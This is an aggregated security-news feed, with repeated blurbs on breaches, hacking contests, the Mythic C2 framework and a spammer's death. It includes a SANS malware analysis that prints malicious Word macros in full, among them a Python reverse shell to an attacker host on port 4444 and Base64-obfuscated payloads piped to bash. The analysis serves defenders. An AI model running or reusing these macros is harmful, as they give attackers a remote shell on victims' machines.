Slapdash setup of Trump website collecting reports of Maricopa County in-person vote irregularities exposed 163,000 voter data records to fraud, via SQL injection.
Read More
The post Trump Site Alleging AZ Election Fraud Exposes Voter Data appeared first on Malware Devil.
The cyberattack has halted chemotherapy, mammogram and screening appointments, and led to 300 staff being furloughed or reassigned.
Read More
The post Cyberattack on UVM Health Network Impedes Chemotherapy Appointments appeared first on Malware Devil.
You can use JumpCloud Directory Insights and our G2 Track integration to view your organization’s SaaS usage and engagement at-a-glance.
The post G2 Track Integration appeared first on JumpCloud.
The post G2 Track Integration appeared first on Security Boulevard.
The post G2 Track Integration appeared first on Malware Devil.
China’s top hacking contest turns months of effort into 15 minutes of exploits, an injection flaw in GitHub Actions, understanding post-compromise activity in exploits targeting Solaris and VoIP, security and quality challenges in integrating software from multiple vendors, and CVE naming turns into wibbly wobbly timey wimey stuff!
Visit https://www.securityweekly.com/asw for all the latest episodes!
Show Notes: https://wiki.securityweekly.com/asw129
The post China’s Top Hacking Contest, GitHub Actions, & Vulnonym – ASW #129 appeared first on Malware Devil.
China’s top hacking contest turns months of effort into 15 minutes of exploits, an injection flaw in GitHub Actions, understanding post-compromise activity in exploits targeting Solaris and VoIP, security and quality challenges in integrating software from multiple vendors, and CVE naming turns into wibbly wobbly timey wimey stuff!
Visit https://www.securityweekly.com/asw for all the latest episodes!
Show Notes: https://wiki.securityweekly.com/asw129
The post China’s Top Hacking Contest, GitHub Actions, & Vulnonym – ASW #129 appeared first on Malware Devil.
Many thanks to DEF CON and Conference Speakers for publishing their outstanding presentations; of which, originally appeared at the organization’s DEFCON 28 SAFE MODE Conference, and on the DEF CON YouTube channel. Enjoy!
The post DEF CON 28 Safe Mode Ham Radio Village – Swissninja’s ‘The OSTRWERK Initiative’ appeared first on Security Boulevard.
The post DEF CON 28 Safe Mode Ham Radio Village – Swissninja’s ‘The OSTRWERK Initiative’ appeared first on Malware Devil.
A few months ago, I announced the rebranding of the Apfell framework to Mythic, but the announcements don’t stop there. Over the next few months there will be a series of blogs talking about some of the cool features or agents of Mythic. One of Mythic’s coolest features is the ability to dynamically plug and play new Payload Types or C2 Profiles due to the Docker-ization of every component. The general Mythic services are shown in the traffic flow diagram below:
Mythic tries to be merely a framework in which the operator and developer have complete control over virtually every aspect of their agents. To that end, there should be an easy way for developers to host and manage new Payload Types and C2 Profiles on their own repositories, but still have them hook into Mythic. This has the added benefit of giving payload/C2 developers complete control over the update frequency of their projects without relying on pull requests from the main Mythic repository.
In order to facilitate this process, I released a template repository called Mythic_External_Agent (https://github.com/its-a-feature/Mythic_External_Agent). This repository provides container folders for a Payload Type, C2 Profiles, Agent icons, and corresponding documentation folders.
To leverage this project, simply fork the Mythic_External_Agent repository (or recreate the folder and file structure in your own repository).
The config.json file allows you to customize which components you want to import into your Mythic instance. You might be wondering why you wouldn’t want to just import everything or how things would even work if you didn’t. That’s due to another one of Mythic’s features — your Payload Type and C2 Profile “container” can be Docker, a VM, or any other host.
The Mythic documentation website has instructions on how to turn a VM or a physical host into a Mythic-compatible “container”. This is useful for situations where your agent has very strict requirements for tasking or payload creation that are too much of a hassle (or impossible) to do within Docker. A few examples where this comes to mind:
Mythic includes a special installer script you can run to remotely fetch and install agents. Simply point it to your repository via ./install_agent_from_github.sh https://github.com/path/to/repo and Mythic will clone it down into a temporary directory called temp, parse the config.json to see which folders to copy out to the right locations, then remove the temp folder. At this point, you can do one of two things to get everything up and going:
That’s it. All of an agent’s components should now be set up for your Mythic agent.
With the external agent capability, developers are able to host their custom agents on any repository that’s git-based (GitHub, BitBucket, GitLab, etc), and are able to do it under their own account. However, this can make it easy to miss agents that exist and lose track of everybody’s amazing work. To help make things easier to find, there is now a MythicAgents organization on GitHub. If you have an agent you would like included with the organization, reach out on Twitter to its_a_feature_ or in the Bloodhound Slack (#mythic channel) and we can get you added. You are still in full control of your agent, but having them in a central group benefits everybody.
The first addition to this collection is Dwight Hohnstein’s Apollo agent.
Apollo is a Windows agent written in C# using the 4.0 .NET Framework designed for SpecterOps training offerings. Be sure to check out Dwight’s upcoming, free SO-CON talk all about Apollo:
If you’re interested in making your own agent, I recommend attending the free SO-CON workshop on how to do it within 2 hours:
Everything for the Hercules agent will be hosted in the MythicAgents organization as well.
Sharing the Myth was originally published in Posts By SpecterOps Team Members on Medium, where people are continuing the conversation by highlighting and responding to this story.
The post Sharing the Myth appeared first on Malware Devil.
This week on Lock and Code, we offer something special for listeners—a backstage pass to a cybersecurity training that we held for employees during Cybersecurity Awareness Month, which ended in October.
The topic? The future of cybersecurity for the Internet of Things.
Our guests, Chief Information Security Officer John Donovan and Security Evangelist and a Director for Malwarebytes Labs Adam Kujawa guide us through some of the future’s most pressing questions. Will we ever run antivirus software on IoT devices? What predictions can we make for how the cybersecurity industry will respond to the next, possible big IoT attack? And what can we do today to stay safe?
This episode was recorded live in front of our fellow Malwarebytes employees (over Zoom, of course, as is tradition during the coronavirus pandemic). The episode even includes a Q&A with our employees.
Tune in to get a glimpse into how Malwarebytes helped its own employees during Cybersecurity Awareness Month, on the latest episode of Lock and Code, with host David Ruiz.
You can also find us on the Apple iTunes store, Google Play Music, and Spotify, plus whatever preferred podcast platform you use.
Stay safe, everyone!
The post Lock and Code S1Ep19: Forecasting IoT cybersecurity with John Donovan and Adam Kujawa appeared first on Malwarebytes Labs.
The post Lock and Code S1Ep19: Forecasting IoT cybersecurity with John Donovan and Adam Kujawa appeared first on Malware Devil.
This week on Lock and Code, we offer something special for listeners–a backstage pass to a cybersecurity training that we held for employees during Cybersecurity Awareness Month, which ended in October.
The topic? The future of cybersecurity for the Internet of Things.
Our guests, Chief Information Security Officer John Donovan and Security Evangelist and a Director for Malwarebytes Labs Adam Kujawa guide us through some of the future’s most pressing questions. Will we ever run antivirus software on IoT devices? What predictions can we make for how the cybersecurity industry will respond to the next, possible big IoT attack? And what can we do today to stay safe?
This episode was recorded live in front of our fellow Malwarebytes employees (over Zoom, of course, as is tradition during the coronavirus pandemic). The episode even includes a Q&A with our employees.
Tune in to get a glimpse into how Malwarebytes helped its own employees during Cybersecurity Awareness Month, on the latest episode of Lock and Code, with host David Ruiz.
You can also find us on the Apple iTunes store, Google Play Music, and Spotify, plus whatever preferred podcast platform you use.
Stay safe, everyone!
The post Lock and Code S1Ep19: Forecasting IoT cybersecurity with John Donovan and Adam Kujawa appeared first on Malware Devil.
This week on Lock and Code, we offer something special for listeners–a backstage pass to a cybersecurity training that we held for employees during Cybersecurity Awareness Month, which ended in October.
The topic? The future of cybersecurity for the Internet of Things.
Our guests, Chief Information Security Officer John Donovan and Security Evangelist and a Director for Malwarebytes Labs Adam Kujawa guide us through some of the future’s most pressing questions. Will we ever run antivirus software on IoT devices? What predictions can we make for how the cybersecurity industry will respond to the next, possible big IoT attack? And what can we do today to stay safe?
This episode was recorded live in front of our fellow Malwarebytes employees (over Zoom, of course, as is tradition during the coronavirus pandemic). The episode even includes a Q&A with our employees.
Tune in to get a glimpse into how Malwarebytes helped its own employees during Cybersecurity Awareness Month, on the latest episode of Lock and Code, with host David Ruiz.
You can also find us on the Apple iTunes store, Google Play Music, and Spotify, plus whatever preferred podcast platform you use.
Stay safe, everyone!
The post Lock and Code S1Ep19: Forecasting IoT cybersecurity with John Donovan and Adam Kujawa appeared first on Malware Devil.
via the Comic Noggins of Nitrozac and Snaggy at The Joy of Tech®!
The post The Joy of Tech® ‘Congrats America’ appeared first on Security Boulevard.
The post The Joy of Tech® ‘Congrats America’ appeared first on Malware Devil.
In the world of IT security in general, 2020 so far could be called the year of ransomware. The news is full of reports of new ransomware attacks and based on the trends so far, we can expect the situation to keep getting worse. Many…
The post 5 Reasons Why Web Security Is Important to Avoid Ransomware appeared first on Acunetix.
The post 5 Reasons Why Web Security Is Important to Avoid Ransomware appeared first on Security Boulevard.
The post 5 Reasons Why Web Security Is Important to Avoid Ransomware appeared first on Malware Devil.
Looking at overall cloud spend can be a common measurement for comparison when determining where your crown jewels data reside The first step to securing your infrastructure is understanding what assets need to be secured. Data classification is the process of organizing data into categories so it is simple to identify, store, retrieve and protect…
The post Using Cloud Costs to Find Your Crown Jewels appeared first on Security Boulevard.
The post Using Cloud Costs to Find Your Crown Jewels appeared first on Malware Devil.
Multiple software products from Adobe, Apple, Google, Microsoft, Mozilla, and Samsung were successfully pwned with previously unseen exploits in Tianfu Cup 2020, the third edition of the international cybersecurity contest held in the city of Chengdu, China.
“Many mature and hard targets have been pwned on this year’s contest,” the event organizers said. “11 out of 16 targets cracked with 23
Read More
The post Windows 10, iOS, Chrome, Firefox and Others Hacked at Tianfu Cup Competition appeared first on Malware Devil.
Multiple software products from Adobe, Apple, Google, Microsoft, Mozilla, and Samsung were successfully pwned with previously unseen exploits in Tianfu Cup 2020, the third edition of the international cybersecurity contest held in the city of Chengdu, China.
“Many mature and hard targets have been pwned on this year’s contest,” the event organizers said. “11 out of 16 targets cracked with 23
Read More
The post Windows 10, iOS, Chrome, Firefox and Others Hacked at Tianfu Cup Competition appeared first on Malware Devil.
While SASE and Zero Trust work well for applications where it’s easy to identify valid users, these frameworks fail to address two specific areas of concern.
The post The Limitations of SASE and Zero Trust appeared first on K2io.
The post The Limitations of SASE and Zero Trust appeared first on Security Boulevard.
The post The Limitations of SASE and Zero Trust appeared first on Malware Devil.
On Friday, I received a bunch of alerts from one of my YARA hunting rules. Several samples were submitted from the same account (through the VT API), from the same country (US), and in a very short period of time. All the submitted files were OLE2 files containing a malicious macro. All of them had a low VT score so it deserved some investigations. I downloaded the samples and had a look at them.
Indeed all OLE2 files contained the same main() macro:
sub Autoexec()
Call Main
End Sub
Sub Auto_Open()
Call Main
End Sub
Sub AutoOpen()
Call Main
End Sub
Sub Workbook_Open()
Call Main
End Sub
I extracted the VBA code via oledump and reviewed them chronologically (based on the upload time on VT). Here is the first version of the macro:
Private Sub Main()
Shell ("python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((""192.168.64.36"",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([""/bin/bash"",""-i""]);'")
End Sub
Nothing fancy, a simple macro based on a /bin/bash backdoor. The presence of Python code and the bash shell indicates that the macro is used in a targeted attack. Same remark for the RFC1918 IP address. The used port (4444) indicates probably the use of a Kali host by the attacker.
Then, the attacker added a notification popup (for debugging purposes?):
Private Sub Main()
Shell ("python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((""192.168.64.36"",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([""/bin/bash"",""-i""]);'")
Shell ("osascript -e 'display notification ""Macro execut<8e>e"" with title ""Microsoft Word"" '")
End Sub
‘osascript’ is a macOS tool that allows executing OSA scripts (AppleScript, JavaScript, etc.)[1]. We learned something new about the target: it uses a macOS device and the attacker speaks in French. We have this string in the OLE2 file:
Attribute VB_Name = “Feuil1” (“Feuille” means “Sheet”)
Also, the displayed notification is in French/
Then the attacker another technique and tried to store the payload into the document comments:
Private Sub Main()
Dim sc As String
sc = ActiveDocument.BuiltInDocumentProperties("comments").Value
Shell (sc)
End Sub
The next step was to obfuscate the payload by reversing the code and encoding in in Base64:
Private Sub Main()
Dim sc As String
sc = ActiveDocument.BuiltInDocumentProperties("comments").Value
sc = Right(sc, Len(sc) - 10)
Shell ("echo """ & sc & """|rev|base64 -D|bash")
End Sub
Another version of the same technique:
Private Sub Main()
Dim sc As String
sc = ActiveDocument.BuiltInDocumentProperties("comments").Value
Shell ("echo """ & sc & """|rev|base64 -D|bash")
End Sub
The next one is funnier: the attacker used the text2speech capabilities of macOS using the ‘say’ command.
Private Sub Main()
Shell ("echo ""KEDI5F2c""|rev|base64 -D|bash")
Shell ("osascript -e 'display notification ""Macro execut<8e>e"" with title ""Microsoft Word"" '")
End Sub
And finally the latest version found with the Base64 data directly available in the macro:
Private Sub Main()
Shell ("echo ""gCnsTKdJSatICLig2chJ2LulmYvIyWowGbhNmLzNXZj9mcwJWdz1Dc7kiMskCKv5WZslmZuMHKyAXdk5ycvByOpEDLpgybuVGbpZmLzhiMwVHZuM3bgsTKwwSKo8mblxWam5ycoIDc1RmLz92OpkCN0QDNsIiNz4CN24CO2EjLykTMigCK0NWZu52bj5yc7kSTBVkUUN1XLN0TT5Cdlt2YvNHLUVkTJ9lRB5Cdlt2YvNHK0V2aj92cuQXZrN2bz1zc7M3bsM3clN2byBnY1NHL0V2aj92cgQncvBXbpdCIj1CIu9Ga0lHc""|rev|base64 -D|bash")
Shell ("osascript -e 'display notification ""Macro execut<8e>e"" with title ""Microsoft Word"" '")
End Sub
Note the Base64 data contains the same Python code as seen in the first version.
Based on all those findings, we can probably conclude that the attacker is preparing a macro to compromise a macOS user. Another red-team exercise on its way?
[1] https://osxdaily.com/2016/08/19/run-applescript-command-line-macos-osascript/
Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License. Read More
The post How Attackers Brush Up Their Malicious Scripts, (Mon, Nov 9th) appeared first on Malware Devil.
The U.S.Department of Justice officially revealed in October what it said were a number of instances of Russian government-sponsored hacking when it formally indicated six members and officers in Russia’s military agency Russian Main Intelligence Directorate (GRU). In addition to naming the members of the hacker group, it was also the first time the U.S…
The post 3 Takeaways from Sandworm Hacker Group’s Indictment appeared first on Security Boulevard.
The post 3 Takeaways from Sandworm Hacker Group’s Indictment appeared first on Malware Devil.
The body of a man found shot inside a burned out vehicle in Canada three years ago has been identified as that of Davis Wolfgang Hawke, a prolific spammer and neo-Nazi who led a failed anti-government march on Washington, D.C. in 1999, according to news reports.
The post Body Found in Canada Identified as Neo-Nazi Spam King appeared first on Security Boulevard.
The post Body Found in Canada Identified as Neo-Nazi Spam King appeared first on Malware Devil.
The body of a man found shot inside a burned out vehicle in Canada three years ago has been identified as that of Davis Wolfgang Hawke, a prolific spammer and neo-Nazi who led a failed anti-government march on Washington, D.C. in 1999, according to news reports.
Homicide detectives said they originally thought the man found June 14, 2017 in a torched SUV on a logging road in Squamish, British Columbia was a local rock climber known to others in the area as a politically progressive vegan named Jesse James.
Davis Wolfgang Hawke. Image: Spam Kings, by Brian McWilliams.
But according to a report from CTV News, at a press conference late last month authorities said new DNA evidence linked to a missing persons investigation has confirmed the man’s true identity as Davis Wolfgang Hawke.
A key subject of the book Spam Kings by Brian McWilliams, Hawke was a Jewish-born American who’d legally changed his name from Andrew Britt Greenbaum. For many years, Hawke was a big time purveyor of spam emails hawking pornography and male enhancement supplements, such as herbal Viagra.
Hawke had reportedly bragged about the money he earned from spam, but told friends he didn’t trust banks and decided to convert his earnings into gold and platinum bars. That sparked rumors that he had possibly buried his ill-gotten gains on his parents’ Massachusetts property.
In 2005, AOL won a $12.8 million lawsuit against him for relentlessly spamming its users. A year later, AOL won a court judgment authorizing them to dig on that property, although no precious metals were ever found.
More recently, Hawke’s Jesse James identity penned a book called Psychology of Seduction, which claimed to merge the “shady world of the pickup artist with modern science, unraveling the mystery of attraction using evolutionary biology and examining seduction through the lens of social and evolutionary psychology.”
The book’s “about the author” page said James was a “disruptive technology pioneer” who was into rock climbing and was a resident of Squamish. It also claimed James held a PhD in theoretical physics from Stanford, and that he was an officer in the Israeli Defense Force.
It might be difficult to fathom why, but Hawke may have made a few enemies over the years. Spam Kings author McWilliams notes that Hawke changed his name with regularity and used many pseudonyms.
“I could definitely see this guy making someone so mad at him they’d want to kill him,” McWilliams told CTV. “He was a guy who really pushed people that way and was a crook. I mean, he was a conman. That was what he was and I can see how somebody might get mad. I can also see him staging his own death or committing suicide in a fashion like that, if that’s what he chose to do. He was just a perplexing guy. I still don’t feel like I have a handle on him and I spent the better part of a year trying to figure out what made him tick.”
The father of the deceased, Hy Greenbaum, has offered a $10,000 reward to any tipster who can help solve his son’s homicide. British Columbia’s Integrated Homicide Investigation Team also is seeking clues, and can be reached at ihitinfo@rcmp-grc.gc.ca.
The post Body Found in Canada Identified as Neo-Nazi Spam King appeared first on Malware Devil.
In 1801, the United States had a small Navy. Thomas Jefferson deployed almost half that Navy—three frigates and a schooner—to the Barbary C...
